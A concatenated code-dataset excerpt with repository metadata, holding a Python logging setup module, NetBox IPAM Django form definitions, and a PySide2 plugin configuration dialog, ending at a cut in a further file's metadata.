qdev_wrappers/logger.py
|
lillian542/qdev-wrappers
|
4b691eba7ff19de8a8fb6f0b97d350710dece018
|
[
"MIT"
] | null | null | null |
qdev_wrappers/logger.py
|
lillian542/qdev-wrappers
|
4b691eba7ff19de8a8fb6f0b97d350710dece018
|
[
"MIT"
] | null | null | null |
qdev_wrappers/logger.py
|
lillian542/qdev-wrappers
|
4b691eba7ff19de8a8fb6f0b97d350710dece018
|
[
"MIT"
] | null | null | null |
import logging
import logging.handlers
import os
from IPython import get_ipython
from qcodes import config
log = logging.getLogger(__name__)
logging_dir = "logs"
history_log_name = "history.log"
python_log_name = 'pythonlog.log'
def start_python_logger() -> None:
"""
Logging of messages passed throug the python logging module
This sets up logging to a time based logging.
This means that all logging messages on or above
filelogginglevel will be written to pythonlog.log
All logging messages on or above consolelogginglevel
will be written to stderr.
"""
formatter = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(message)s')
try:
filelogginglevel = config.core.file_loglevel
except KeyError:
filelogginglevel = "INFO"
consolelogginglevel = config.core.loglevel
ch = logging.StreamHandler()
ch.setLevel(consolelogginglevel)
ch.setFormatter(formatter)
filename = os.path.join(config.user.mainfolder,
logging_dir,
python_log_name)
os.makedirs(os.path.dirname(filename), exist_ok=True)
fh1 = logging.handlers.TimedRotatingFileHandler(filename,
when='midnight')
fh1.setLevel(filelogginglevel)
fh1.setFormatter(formatter)
logging.basicConfig(handlers=[ch, fh1], level=logging.DEBUG)
# capture any warnings from the warnings module
logging.captureWarnings(capture=True)
log.info("QCoDes python logger setup")
def start_command_history_logger():
"""
logging of the history of the interactive command shell
works only with ipython
"""
ipython = get_ipython()
if ipython is None:
raise RuntimeError("History can't be saved. "
"-Refusing to proceed (use IPython/jupyter)")
ipython.magic("%logstop")
filename = os.path.join(config.user.mainfolder,
logging_dir,
history_log_name)
os.makedirs(os.path.dirname(filename), exist_ok=True)
ipython.magic("%logstart -t -o {} {}".format(filename, "append"))
log.info("Started logging IPython history")
def start_logging():
start_python_logger()
start_command_history_logger()
| 32.928571
| 72
| 0.663774
|
3353d981f6b15a5a92c3520b47ebcef094fab5d7
| 31,386
|
py
|
Python
|
netbox/ipam/forms.py
|
ChrisdAutume/netbox
|
bcb1d9af0be7ae8bd1236b9b7a0e3c98f41e8f4a
|
[
"Apache-2.0"
] | 1
|
2018-07-31T06:54:02.000Z
|
2018-07-31T06:54:02.000Z
|
netbox/ipam/forms.py
|
ChrisdAutume/netbox
|
bcb1d9af0be7ae8bd1236b9b7a0e3c98f41e8f4a
|
[
"Apache-2.0"
] | null | null | null |
netbox/ipam/forms.py
|
ChrisdAutume/netbox
|
bcb1d9af0be7ae8bd1236b9b7a0e3c98f41e8f4a
|
[
"Apache-2.0"
] | 1
|
2019-02-19T22:04:10.000Z
|
2019-02-19T22:04:10.000Z
|
from __future__ import unicode_literals
from django import forms
from django.core.exceptions import MultipleObjectsReturned
from django.db.models import Count
from dcim.models import Site, Rack, Device, Interface
from extras.forms import CustomFieldForm, CustomFieldBulkEditForm, CustomFieldFilterForm
from tenancy.forms import TenancyForm
from tenancy.models import Tenant
from utilities.forms import (
AnnotatedMultipleChoiceField, APISelect, BootstrapMixin, BulkEditNullBooleanSelect, ChainedModelChoiceField,
CSVChoiceField, ExpandableIPAddressField, FilterChoiceField, FlexibleModelChoiceField, Livesearch, ReturnURLForm,
SlugField, add_blank_choice,
)
from virtualization.models import VirtualMachine
from .constants import IPADDRESS_ROLE_CHOICES, IPADDRESS_STATUS_CHOICES, PREFIX_STATUS_CHOICES, VLAN_STATUS_CHOICES
from .models import Aggregate, IPAddress, Prefix, RIR, Role, Service, VLAN, VLANGroup, VRF
IP_FAMILY_CHOICES = [
('', 'All'),
(4, 'IPv4'),
(6, 'IPv6'),
]
PREFIX_MASK_LENGTH_CHOICES = add_blank_choice([(i, i) for i in range(1, 128)])
IPADDRESS_MASK_LENGTH_CHOICES = add_blank_choice([(i, i) for i in range(1, 129)])
#
# VRFs
#
class VRFForm(BootstrapMixin, TenancyForm, CustomFieldForm):
class Meta:
model = VRF
fields = ['name', 'rd', 'enforce_unique', 'description', 'tenant_group', 'tenant']
labels = {
'rd': "RD",
}
help_texts = {
'rd': "Route distinguisher in any format",
}
class VRFCSVForm(forms.ModelForm):
tenant = forms.ModelChoiceField(
queryset=Tenant.objects.all(),
required=False,
to_field_name='name',
help_text='Name of assigned tenant',
error_messages={
'invalid_choice': 'Tenant not found.',
}
)
class Meta:
model = VRF
fields = VRF.csv_headers
help_texts = {
'name': 'VRF name',
}
class VRFBulkEditForm(BootstrapMixin, CustomFieldBulkEditForm):
pk = forms.ModelMultipleChoiceField(queryset=VRF.objects.all(), widget=forms.MultipleHiddenInput)
tenant = forms.ModelChoiceField(queryset=Tenant.objects.all(), required=False)
enforce_unique = forms.NullBooleanField(
required=False, widget=BulkEditNullBooleanSelect, label='Enforce unique space'
)
description = forms.CharField(max_length=100, required=False)
class Meta:
nullable_fields = ['tenant', 'description']
class VRFFilterForm(BootstrapMixin, CustomFieldFilterForm):
model = VRF
q = forms.CharField(required=False, label='Search')
tenant = FilterChoiceField(
queryset=Tenant.objects.annotate(filter_count=Count('vrfs')),
to_field_name='slug',
null_label='-- None --'
)
#
# RIRs
#
class RIRForm(BootstrapMixin, forms.ModelForm):
slug = SlugField()
class Meta:
model = RIR
fields = ['name', 'slug', 'is_private']
class RIRCSVForm(forms.ModelForm):
slug = SlugField()
class Meta:
model = RIR
fields = RIR.csv_headers
help_texts = {
'name': 'RIR name',
}
class RIRFilterForm(BootstrapMixin, forms.Form):
is_private = forms.NullBooleanField(required=False, label='Private', widget=forms.Select(choices=[
('', '---------'),
('True', 'Yes'),
('False', 'No'),
]))
#
# Aggregates
#
class AggregateForm(BootstrapMixin, CustomFieldForm):
class Meta:
model = Aggregate
fields = ['prefix', 'rir', 'date_added', 'description']
help_texts = {
'prefix': "IPv4 or IPv6 network",
'rir': "Regional Internet Registry responsible for this prefix",
'date_added': "Format: YYYY-MM-DD",
}
class AggregateCSVForm(forms.ModelForm):
rir = forms.ModelChoiceField(
queryset=RIR.objects.all(),
to_field_name='name',
help_text='Name of parent RIR',
error_messages={
'invalid_choice': 'RIR not found.',
}
)
class Meta:
model = Aggregate
fields = Aggregate.csv_headers
class AggregateBulkEditForm(BootstrapMixin, CustomFieldBulkEditForm):
pk = forms.ModelMultipleChoiceField(queryset=Aggregate.objects.all(), widget=forms.MultipleHiddenInput)
rir = forms.ModelChoiceField(queryset=RIR.objects.all(), required=False, label='RIR')
date_added = forms.DateField(required=False)
description = forms.CharField(max_length=100, required=False)
class Meta:
nullable_fields = ['date_added', 'description']
class AggregateFilterForm(BootstrapMixin, CustomFieldFilterForm):
model = Aggregate
q = forms.CharField(required=False, label='Search')
family = forms.ChoiceField(required=False, choices=IP_FAMILY_CHOICES, label='Address Family')
rir = FilterChoiceField(
queryset=RIR.objects.annotate(filter_count=Count('aggregates')),
to_field_name='slug',
label='RIR'
)
#
# Roles
#
class RoleForm(BootstrapMixin, forms.ModelForm):
slug = SlugField()
class Meta:
model = Role
fields = ['name', 'slug']
class RoleCSVForm(forms.ModelForm):
slug = SlugField()
class Meta:
model = Role
fields = Role.csv_headers
help_texts = {
'name': 'Role name',
}
#
# Prefixes
#
class PrefixForm(BootstrapMixin, TenancyForm, CustomFieldForm):
site = forms.ModelChoiceField(
queryset=Site.objects.all(),
required=False,
label='Site',
widget=forms.Select(
attrs={'filter-for': 'vlan_group', 'nullable': 'true'}
)
)
vlan_group = ChainedModelChoiceField(
queryset=VLANGroup.objects.all(),
chains=(
('site', 'site'),
),
required=False,
label='VLAN group',
widget=APISelect(
api_url='/api/ipam/vlan-groups/?site_id={{site}}',
attrs={'filter-for': 'vlan', 'nullable': 'true'}
)
)
vlan = ChainedModelChoiceField(
queryset=VLAN.objects.all(),
chains=(
('site', 'site'),
('group', 'vlan_group'),
),
required=False,
label='VLAN',
widget=APISelect(
api_url='/api/ipam/vlans/?site_id={{site}}&group_id={{vlan_group}}', display_field='display_name'
)
)
class Meta:
model = Prefix
fields = ['prefix', 'vrf', 'site', 'vlan', 'status', 'role', 'is_pool', 'description', 'tenant_group', 'tenant']
def __init__(self, *args, **kwargs):
# Initialize helper selectors
instance = kwargs.get('instance')
initial = kwargs.get('initial', {}).copy()
if instance and instance.vlan is not None:
initial['vlan_group'] = instance.vlan.group
kwargs['initial'] = initial
super(PrefixForm, self).__init__(*args, **kwargs)
self.fields['vrf'].empty_label = 'Global'
class PrefixCSVForm(forms.ModelForm):
vrf = forms.ModelChoiceField(
queryset=VRF.objects.all(),
required=False,
to_field_name='rd',
help_text='Route distinguisher of parent VRF',
error_messages={
'invalid_choice': 'VRF not found.',
}
)
tenant = forms.ModelChoiceField(
queryset=Tenant.objects.all(),
required=False,
to_field_name='name',
help_text='Name of assigned tenant',
error_messages={
'invalid_choice': 'Tenant not found.',
}
)
site = forms.ModelChoiceField(
queryset=Site.objects.all(),
required=False,
to_field_name='name',
help_text='Name of parent site',
error_messages={
'invalid_choice': 'Site not found.',
}
)
vlan_group = forms.CharField(
help_text='Group name of assigned VLAN',
required=False
)
vlan_vid = forms.IntegerField(
help_text='Numeric ID of assigned VLAN',
required=False
)
status = CSVChoiceField(
choices=PREFIX_STATUS_CHOICES,
help_text='Operational status'
)
role = forms.ModelChoiceField(
queryset=Role.objects.all(),
required=False,
to_field_name='name',
help_text='Functional role',
error_messages={
'invalid_choice': 'Invalid role.',
}
)
class Meta:
model = Prefix
fields = Prefix.csv_headers
def clean(self):
super(PrefixCSVForm, self).clean()
site = self.cleaned_data.get('site')
vlan_group = self.cleaned_data.get('vlan_group')
vlan_vid = self.cleaned_data.get('vlan_vid')
# Validate VLAN
if vlan_group and vlan_vid:
try:
self.instance.vlan = VLAN.objects.get(site=site, group__name=vlan_group, vid=vlan_vid)
except VLAN.DoesNotExist:
if site:
raise forms.ValidationError("VLAN {} not found in site {} group {}".format(
vlan_vid, site, vlan_group
))
else:
raise forms.ValidationError("Global VLAN {} not found in group {}".format(vlan_vid, vlan_group))
except MultipleObjectsReturned:
raise forms.ValidationError(
"Multiple VLANs with VID {} found in group {}".format(vlan_vid, vlan_group)
)
elif vlan_vid:
try:
self.instance.vlan = VLAN.objects.get(site=site, group__isnull=True, vid=vlan_vid)
except VLAN.DoesNotExist:
if site:
raise forms.ValidationError("VLAN {} not found in site {}".format(vlan_vid, site))
else:
raise forms.ValidationError("Global VLAN {} not found".format(vlan_vid))
except MultipleObjectsReturned:
raise forms.ValidationError("Multiple VLANs with VID {} found".format(vlan_vid))
class PrefixBulkEditForm(BootstrapMixin, CustomFieldBulkEditForm):
pk = forms.ModelMultipleChoiceField(queryset=Prefix.objects.all(), widget=forms.MultipleHiddenInput)
site = forms.ModelChoiceField(queryset=Site.objects.all(), required=False)
vrf = forms.ModelChoiceField(queryset=VRF.objects.all(), required=False, label='VRF')
tenant = forms.ModelChoiceField(queryset=Tenant.objects.all(), required=False)
status = forms.ChoiceField(choices=add_blank_choice(PREFIX_STATUS_CHOICES), required=False)
role = forms.ModelChoiceField(queryset=Role.objects.all(), required=False)
is_pool = forms.NullBooleanField(required=False, widget=BulkEditNullBooleanSelect, label='Is a pool')
description = forms.CharField(max_length=100, required=False)
class Meta:
nullable_fields = ['site', 'vrf', 'tenant', 'role', 'description']
class PrefixFilterForm(BootstrapMixin, CustomFieldFilterForm):
model = Prefix
q = forms.CharField(required=False, label='Search')
within_include = forms.CharField(required=False, label='Search within', widget=forms.TextInput(attrs={
'placeholder': 'Prefix',
}))
family = forms.ChoiceField(required=False, choices=IP_FAMILY_CHOICES, label='Address family')
mask_length = forms.ChoiceField(required=False, choices=PREFIX_MASK_LENGTH_CHOICES, label='Mask length')
vrf = FilterChoiceField(
queryset=VRF.objects.annotate(filter_count=Count('prefixes')),
to_field_name='rd',
label='VRF',
null_label='-- Global --'
)
tenant = FilterChoiceField(
queryset=Tenant.objects.annotate(filter_count=Count('prefixes')),
to_field_name='slug',
null_label='-- None --'
)
status = AnnotatedMultipleChoiceField(
choices=PREFIX_STATUS_CHOICES,
annotate=Prefix.objects.all(),
annotate_field='status',
required=False
)
site = FilterChoiceField(
queryset=Site.objects.annotate(filter_count=Count('prefixes')),
to_field_name='slug',
null_label='-- None --'
)
role = FilterChoiceField(
queryset=Role.objects.annotate(filter_count=Count('prefixes')),
to_field_name='slug',
null_label='-- None --'
)
expand = forms.BooleanField(required=False, label='Expand prefix hierarchy')
#
# IP addresses
#
class IPAddressForm(BootstrapMixin, TenancyForm, ReturnURLForm, CustomFieldForm):
interface = forms.ModelChoiceField(
queryset=Interface.objects.all(),
required=False
)
nat_site = forms.ModelChoiceField(
queryset=Site.objects.all(),
required=False,
label='Site',
widget=forms.Select(
attrs={'filter-for': 'nat_rack'}
)
)
nat_rack = ChainedModelChoiceField(
queryset=Rack.objects.all(),
chains=(
('site', 'nat_site'),
),
required=False,
label='Rack',
widget=APISelect(
api_url='/api/dcim/racks/?site_id={{nat_site}}',
display_field='display_name',
attrs={'filter-for': 'nat_device', 'nullable': 'true'}
)
)
nat_device = ChainedModelChoiceField(
queryset=Device.objects.all(),
chains=(
('site', 'nat_site'),
('rack', 'nat_rack'),
),
required=False,
label='Device',
widget=APISelect(
api_url='/api/dcim/devices/?site_id={{nat_site}}&rack_id={{nat_rack}}',
display_field='display_name',
attrs={'filter-for': 'nat_inside'}
)
)
nat_inside = ChainedModelChoiceField(
queryset=IPAddress.objects.all(),
chains=(
('interface__device', 'nat_device'),
),
required=False,
label='IP Address',
widget=APISelect(
api_url='/api/ipam/ip-addresses/?device_id={{nat_device}}',
display_field='address'
)
)
livesearch = forms.CharField(
required=False,
label='Search',
widget=Livesearch(
query_key='q',
query_url='ipam-api:ipaddress-list',
field_to_update='nat_inside',
obj_label='address'
)
)
primary_for_parent = forms.BooleanField(required=False, label='Make this the primary IP for the device/VM')
class Meta:
model = IPAddress
fields = [
'address', 'vrf', 'status', 'role', 'description', 'interface', 'primary_for_parent', 'nat_site',
'nat_rack', 'nat_inside', 'tenant_group', 'tenant',
]
def __init__(self, *args, **kwargs):
# Initialize helper selectors
instance = kwargs.get('instance')
initial = kwargs.get('initial', {}).copy()
if instance and instance.nat_inside and instance.nat_inside.device is not None:
initial['nat_site'] = instance.nat_inside.device.site
initial['nat_rack'] = instance.nat_inside.device.rack
initial['nat_device'] = instance.nat_inside.device
kwargs['initial'] = initial
super(IPAddressForm, self).__init__(*args, **kwargs)
self.fields['vrf'].empty_label = 'Global'
# Limit interface selections to those belonging to the parent device/VM
if self.instance and self.instance.interface:
self.fields['interface'].queryset = Interface.objects.filter(
device=self.instance.interface.device, virtual_machine=self.instance.interface.virtual_machine
)
else:
self.fields['interface'].choices = []
# Initialize primary_for_parent if IP address is already assigned
if self.instance.pk and self.instance.interface is not None:
parent = self.instance.interface.parent
if (
self.instance.address.version == 4 and parent.primary_ip4_id == self.instance.pk or
self.instance.address.version == 6 and parent.primary_ip6_id == self.instance.pk
):
self.initial['primary_for_parent'] = True
def clean(self):
super(IPAddressForm, self).clean()
# Primary IP assignment is only available if an interface has been assigned.
if self.cleaned_data.get('primary_for_parent') and not self.cleaned_data.get('interface'):
self.add_error(
'primary_for_parent', "Only IP addresses assigned to an interface can be designated as primary IPs."
)
def save(self, *args, **kwargs):
ipaddress = super(IPAddressForm, self).save(*args, **kwargs)
# Assign/clear this IPAddress as the primary for the associated Device/VirtualMachine.
if self.cleaned_data['primary_for_parent']:
parent = self.cleaned_data['interface'].parent
if ipaddress.address.version == 4:
parent.primary_ip4 = ipaddress
else:
parent.primary_ip6 = ipaddress
parent.save()
elif self.cleaned_data['interface']:
parent = self.cleaned_data['interface'].parent
if ipaddress.address.version == 4 and parent.primary_ip4 == ipaddress:
parent.primary_ip4 = None
parent.save()
elif ipaddress.address.version == 6 and parent.primary_ip6 == ipaddress:
parent.primary_ip6 = None
parent.save()
return ipaddress
class IPAddressBulkCreateForm(BootstrapMixin, forms.Form):
pattern = ExpandableIPAddressField(label='Address pattern')
class IPAddressBulkAddForm(BootstrapMixin, TenancyForm, CustomFieldForm):
class Meta:
model = IPAddress
fields = ['address', 'vrf', 'status', 'role', 'description', 'tenant_group', 'tenant']
def __init__(self, *args, **kwargs):
super(IPAddressBulkAddForm, self).__init__(*args, **kwargs)
self.fields['vrf'].empty_label = 'Global'
class IPAddressCSVForm(forms.ModelForm):
vrf = forms.ModelChoiceField(
queryset=VRF.objects.all(),
required=False,
to_field_name='rd',
help_text='Route distinguisher of the assigned VRF',
error_messages={
'invalid_choice': 'VRF not found.',
}
)
tenant = forms.ModelChoiceField(
queryset=Tenant.objects.all(),
to_field_name='name',
required=False,
help_text='Name of the assigned tenant',
error_messages={
'invalid_choice': 'Tenant not found.',
}
)
status = CSVChoiceField(
choices=IPADDRESS_STATUS_CHOICES,
help_text='Operational status'
)
role = CSVChoiceField(
choices=IPADDRESS_ROLE_CHOICES,
required=False,
help_text='Functional role'
)
device = FlexibleModelChoiceField(
queryset=Device.objects.all(),
required=False,
to_field_name='name',
help_text='Name or ID of assigned device',
error_messages={
'invalid_choice': 'Device not found.',
}
)
virtual_machine = forms.ModelChoiceField(
queryset=VirtualMachine.objects.all(),
required=False,
to_field_name='name',
help_text='Name of assigned virtual machine',
error_messages={
'invalid_choice': 'Virtual machine not found.',
}
)
interface_name = forms.CharField(
help_text='Name of assigned interface',
required=False
)
is_primary = forms.BooleanField(
help_text='Make this the primary IP for the assigned device',
required=False
)
class Meta:
model = IPAddress
fields = IPAddress.csv_headers
def clean(self):
super(IPAddressCSVForm, self).clean()
device = self.cleaned_data.get('device')
virtual_machine = self.cleaned_data.get('virtual_machine')
interface_name = self.cleaned_data.get('interface_name')
is_primary = self.cleaned_data.get('is_primary')
# Validate interface
if interface_name and device:
try:
self.instance.interface = Interface.objects.get(device=device, name=interface_name)
except Interface.DoesNotExist:
raise forms.ValidationError("Invalid interface {} for device {}".format(
interface_name, device
))
elif interface_name and virtual_machine:
try:
self.instance.interface = Interface.objects.get(virtual_machine=virtual_machine, name=interface_name)
except Interface.DoesNotExist:
raise forms.ValidationError("Invalid interface {} for virtual machine {}".format(
interface_name, virtual_machine
))
elif interface_name:
raise forms.ValidationError("Interface given ({}) but parent device/virtual machine not specified".format(
interface_name
))
elif device:
raise forms.ValidationError("Device specified ({}) but interface missing".format(device))
elif virtual_machine:
raise forms.ValidationError("Virtual machine specified ({}) but interface missing".format(virtual_machine))
# Validate is_primary
if is_primary and not device and not virtual_machine:
raise forms.ValidationError("No device or virtual machine specified; cannot set as primary IP")
def save(self, *args, **kwargs):
# Set interface
if self.cleaned_data['device'] and self.cleaned_data['interface_name']:
self.instance.interface = Interface.objects.get(
device=self.cleaned_data['device'],
name=self.cleaned_data['interface_name']
)
elif self.cleaned_data['virtual_machine'] and self.cleaned_data['interface_name']:
self.instance.interface = Interface.objects.get(
virtual_machine=self.cleaned_data['virtual_machine'],
name=self.cleaned_data['interface_name']
)
ipaddress = super(IPAddressCSVForm, self).save(*args, **kwargs)
# Set as primary for device/VM
if self.cleaned_data['is_primary']:
parent = self.cleaned_data['device'] or self.cleaned_data['virtual_machine']
if self.instance.address.version == 4:
parent.primary_ip4 = ipaddress
elif self.instance.address.version == 6:
parent.primary_ip6 = ipaddress
parent.save()
return ipaddress
class IPAddressBulkEditForm(BootstrapMixin, CustomFieldBulkEditForm):
pk = forms.ModelMultipleChoiceField(queryset=IPAddress.objects.all(), widget=forms.MultipleHiddenInput)
vrf = forms.ModelChoiceField(queryset=VRF.objects.all(), required=False, label='VRF')
tenant = forms.ModelChoiceField(queryset=Tenant.objects.all(), required=False)
status = forms.ChoiceField(choices=add_blank_choice(IPADDRESS_STATUS_CHOICES), required=False)
role = forms.ChoiceField(choices=add_blank_choice(IPADDRESS_ROLE_CHOICES), required=False)
description = forms.CharField(max_length=100, required=False)
class Meta:
nullable_fields = ['vrf', 'role', 'tenant', 'description']
class IPAddressAssignForm(BootstrapMixin, forms.Form):
vrf = forms.ModelChoiceField(queryset=VRF.objects.all(), required=False, label='VRF', empty_label='Global')
address = forms.CharField(label='IP Address')
class IPAddressFilterForm(BootstrapMixin, CustomFieldFilterForm):
model = IPAddress
q = forms.CharField(required=False, label='Search')
parent = forms.CharField(required=False, label='Parent Prefix', widget=forms.TextInput(attrs={
'placeholder': 'Prefix',
}))
family = forms.ChoiceField(required=False, choices=IP_FAMILY_CHOICES, label='Address family')
mask_length = forms.ChoiceField(required=False, choices=IPADDRESS_MASK_LENGTH_CHOICES, label='Mask length')
vrf = FilterChoiceField(
queryset=VRF.objects.annotate(filter_count=Count('ip_addresses')),
to_field_name='rd',
label='VRF',
null_label='-- Global --'
)
tenant = FilterChoiceField(
queryset=Tenant.objects.annotate(filter_count=Count('ip_addresses')),
to_field_name='slug',
null_label='-- None --'
)
status = AnnotatedMultipleChoiceField(
choices=IPADDRESS_STATUS_CHOICES,
annotate=IPAddress.objects.all(),
annotate_field='status',
required=False
)
role = AnnotatedMultipleChoiceField(
choices=IPADDRESS_ROLE_CHOICES,
annotate=IPAddress.objects.all(),
annotate_field='role',
required=False
)
#
# VLAN groups
#
class VLANGroupForm(BootstrapMixin, forms.ModelForm):
slug = SlugField()
class Meta:
model = VLANGroup
fields = ['site', 'name', 'slug']
class VLANGroupCSVForm(forms.ModelForm):
site = forms.ModelChoiceField(
queryset=Site.objects.all(),
required=False,
to_field_name='name',
help_text='Name of parent site',
error_messages={
'invalid_choice': 'Site not found.',
}
)
slug = SlugField()
class Meta:
model = VLANGroup
fields = VLANGroup.csv_headers
help_texts = {
'name': 'Name of VLAN group',
}
class VLANGroupFilterForm(BootstrapMixin, forms.Form):
site = FilterChoiceField(
queryset=Site.objects.annotate(filter_count=Count('vlan_groups')),
to_field_name='slug',
null_label='-- Global --'
)
#
# VLANs
#
class VLANForm(BootstrapMixin, TenancyForm, CustomFieldForm):
site = forms.ModelChoiceField(
queryset=Site.objects.all(),
required=False,
widget=forms.Select(
attrs={'filter-for': 'group', 'nullable': 'true'}
)
)
group = ChainedModelChoiceField(
queryset=VLANGroup.objects.all(),
chains=(
('site', 'site'),
),
required=False,
label='Group',
widget=APISelect(
api_url='/api/ipam/vlan-groups/?site_id={{site}}',
)
)
class Meta:
model = VLAN
fields = ['site', 'group', 'vid', 'name', 'status', 'role', 'description', 'tenant_group', 'tenant']
help_texts = {
'site': "Leave blank if this VLAN spans multiple sites",
'group': "VLAN group (optional)",
'vid': "Configured VLAN ID",
'name': "Configured VLAN name",
'status': "Operational status of this VLAN",
'role': "The primary function of this VLAN",
}
class VLANCSVForm(forms.ModelForm):
site = forms.ModelChoiceField(
queryset=Site.objects.all(),
required=False,
to_field_name='name',
help_text='Name of parent site',
error_messages={
'invalid_choice': 'Site not found.',
}
)
group_name = forms.CharField(
help_text='Name of VLAN group',
required=False
)
tenant = forms.ModelChoiceField(
queryset=Tenant.objects.all(),
to_field_name='name',
required=False,
help_text='Name of assigned tenant',
error_messages={
'invalid_choice': 'Tenant not found.',
}
)
status = CSVChoiceField(
choices=VLAN_STATUS_CHOICES,
help_text='Operational status'
)
role = forms.ModelChoiceField(
queryset=Role.objects.all(),
required=False,
to_field_name='name',
help_text='Functional role',
error_messages={
'invalid_choice': 'Invalid role.',
}
)
class Meta:
model = VLAN
fields = VLAN.csv_headers
help_texts = {
'vid': 'Numeric VLAN ID (1-4095)',
'name': 'VLAN name',
}
def clean(self):
super(VLANCSVForm, self).clean()
site = self.cleaned_data.get('site')
group_name = self.cleaned_data.get('group_name')
# Validate VLAN group
if group_name:
try:
self.instance.group = VLANGroup.objects.get(site=site, name=group_name)
except VLANGroup.DoesNotExist:
if site:
raise forms.ValidationError("VLAN group {} not found for site {}".format(group_name, site))
else:
raise forms.ValidationError("Global VLAN group {} not found".format(group_name))
class VLANBulkEditForm(BootstrapMixin, CustomFieldBulkEditForm):
pk = forms.ModelMultipleChoiceField(queryset=VLAN.objects.all(), widget=forms.MultipleHiddenInput)
site = forms.ModelChoiceField(queryset=Site.objects.all(), required=False)
group = forms.ModelChoiceField(queryset=VLANGroup.objects.all(), required=False)
tenant = forms.ModelChoiceField(queryset=Tenant.objects.all(), required=False)
status = forms.ChoiceField(choices=add_blank_choice(VLAN_STATUS_CHOICES), required=False)
role = forms.ModelChoiceField(queryset=Role.objects.all(), required=False)
description = forms.CharField(max_length=100, required=False)
class Meta:
nullable_fields = ['site', 'group', 'tenant', 'role', 'description']
class VLANFilterForm(BootstrapMixin, CustomFieldFilterForm):
model = VLAN
q = forms.CharField(required=False, label='Search')
site = FilterChoiceField(
queryset=Site.objects.annotate(filter_count=Count('vlans')),
to_field_name='slug',
null_label='-- Global --'
)
group_id = FilterChoiceField(
queryset=VLANGroup.objects.annotate(filter_count=Count('vlans')),
label='VLAN group',
null_label='-- None --'
)
tenant = FilterChoiceField(
queryset=Tenant.objects.annotate(filter_count=Count('vlans')),
to_field_name='slug',
null_label='-- None --'
)
status = AnnotatedMultipleChoiceField(
choices=VLAN_STATUS_CHOICES,
annotate=VLAN.objects.all(),
annotate_field='status',
required=False
)
role = FilterChoiceField(
queryset=Role.objects.annotate(filter_count=Count('vlans')),
to_field_name='slug',
null_label='-- None --'
)
#
# Services
#
class ServiceForm(BootstrapMixin, forms.ModelForm):
class Meta:
model = Service
fields = ['name', 'protocol', 'port', 'ipaddresses', 'description']
help_texts = {
'ipaddresses': "IP address assignment is optional. If no IPs are selected, the service is assumed to be "
"reachable via all IPs assigned to the device.",
}
def __init__(self, *args, **kwargs):
super(ServiceForm, self).__init__(*args, **kwargs)
# Limit IP address choices to those assigned to interfaces of the parent device/VM
if self.instance.device:
vc_interface_ids = [i['id'] for i in self.instance.device.vc_interfaces.values('id')]
self.fields['ipaddresses'].queryset = IPAddress.objects.filter(
interface_id__in=vc_interface_ids
)
elif self.instance.virtual_machine:
self.fields['ipaddresses'].queryset = IPAddress.objects.filter(
interface__virtual_machine=self.instance.virtual_machine
)
else:
self.fields['ipaddresses'].choices = []
| 33.603854
| 120
| 0.626744
|
f9b24fe274b0d4531023af207e705d1f30d6e0b9
| 3,445
|
py
|
Python
|
mapclientplugins/simulationtask3step/configuredialog.py
|
tsalemink/mapclientplugins.simulationtask3step
|
09ee208b3b9bca28518b59bb06833ca3f23cb391
|
[
"Apache-2.0"
] | null | null | null |
mapclientplugins/simulationtask3step/configuredialog.py
|
tsalemink/mapclientplugins.simulationtask3step
|
09ee208b3b9bca28518b59bb06833ca3f23cb391
|
[
"Apache-2.0"
] | null | null | null |
mapclientplugins/simulationtask3step/configuredialog.py
|
tsalemink/mapclientplugins.simulationtask3step
|
09ee208b3b9bca28518b59bb06833ca3f23cb391
|
[
"Apache-2.0"
] | 1
|
2021-06-10T03:39:25.000Z
|
2021-06-10T03:39:25.000Z
|
from PySide2 import QtWidgets
from mapclientplugins.simulationtask3step.ui_configuredialog import Ui_ConfigureDialog
INVALID_STYLE_SHEET = 'background-color: rgba(239, 0, 0, 50)'
DEFAULT_STYLE_SHEET = ''
class ConfigureDialog(QtWidgets.QDialog):
'''
Configure dialog to present the user with the options to configure this step.
'''
def __init__(self, parent=None):
'''
Constructor
'''
QtWidgets.QDialog.__init__(self, parent)
self._ui = Ui_ConfigureDialog()
self._ui.setupUi(self)
# Keep track of the previous identifier so that we can track changes
# and know how many occurrences of the current identifier there should
# be.
self._previousIdentifier = ''
# Set a place holder for a callable that will get set from the step.
# We will use this method to decide whether the identifier is unique.
self.identifierOccursCount = None
self._makeConnections()
def _makeConnections(self):
self._ui.lineEdit0.textChanged.connect(self.validate)
def accept(self):
'''
Override the accept method so that we can confirm saving an
invalid configuration.
'''
result = QtWidgets.QMessageBox.Yes
if not self.validate():
result = QtWidgets.QMessageBox.warning(self, 'Invalid Configuration',
'This configuration is invalid. Unpredictable behaviour may result if you choose \'Yes\', are you sure you want to save this configuration?)',
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No,
QtWidgets.QMessageBox.No)
if result == QtWidgets.QMessageBox.Yes:
QtWidgets.QDialog.accept(self)
def validate(self):
'''
Validate the configuration dialog fields. For any field that is not valid
set the style sheet to the INVALID_STYLE_SHEET. Return the outcome of the
overall validity of the configuration.
'''
# Determine if the current identifier is unique throughout the workflow
# The identifierOccursCount method is part of the interface to the workflow framework.
value = self.identifierOccursCount(self._ui.lineEdit0.text())
valid = (value == 0) or (value == 1 and self._previousIdentifier == self._ui.lineEdit0.text())
if valid:
self._ui.lineEdit0.setStyleSheet(DEFAULT_STYLE_SHEET)
else:
self._ui.lineEdit0.setStyleSheet(INVALID_STYLE_SHEET)
return valid
def getConfig(self):
'''
Get the current value of the configuration from the dialog. Also
set the _previousIdentifier value so that we can check uniqueness of the
identifier over the whole of the workflow.
'''
self._previousIdentifier = self._ui.lineEdit0.text()
config = {}
config['identifier'] = self._ui.lineEdit0.text()
return config
def setConfig(self, config):
'''
Set the current value of the configuration for the dialog. Also
set the _previousIdentifier value so that we can check uniqueness of the
identifier over the whole of the workflow.
'''
self._previousIdentifier = config['identifier']
self._ui.lineEdit0.setText(config['identifier'])
| 40.05814
| 194
| 0.64209
|
696ade976ba0e2e884c3463b018c1b1ee4501659
| 3,592
|
py
|
Python
|
LAB03/01-DDB/backend/cloudalbum/database/model_ddb.py
|
liks79/moving-to-serverless-renew
|
2f173071ab387654d4cc851a0b39130613906378
|
[
"MIT"
] | 6
|
2019-08-21T04:13:34.000Z
|
2019-10-29T07:15:39.000Z
|
LAB03/01-DDB/backend/cloudalbum/database/model_ddb.py
|
liks79/moving-to-serverless-renew
|
2f173071ab387654d4cc851a0b39130613906378
|
[
"MIT"
] | 89
|
2019-07-31T02:29:54.000Z
|
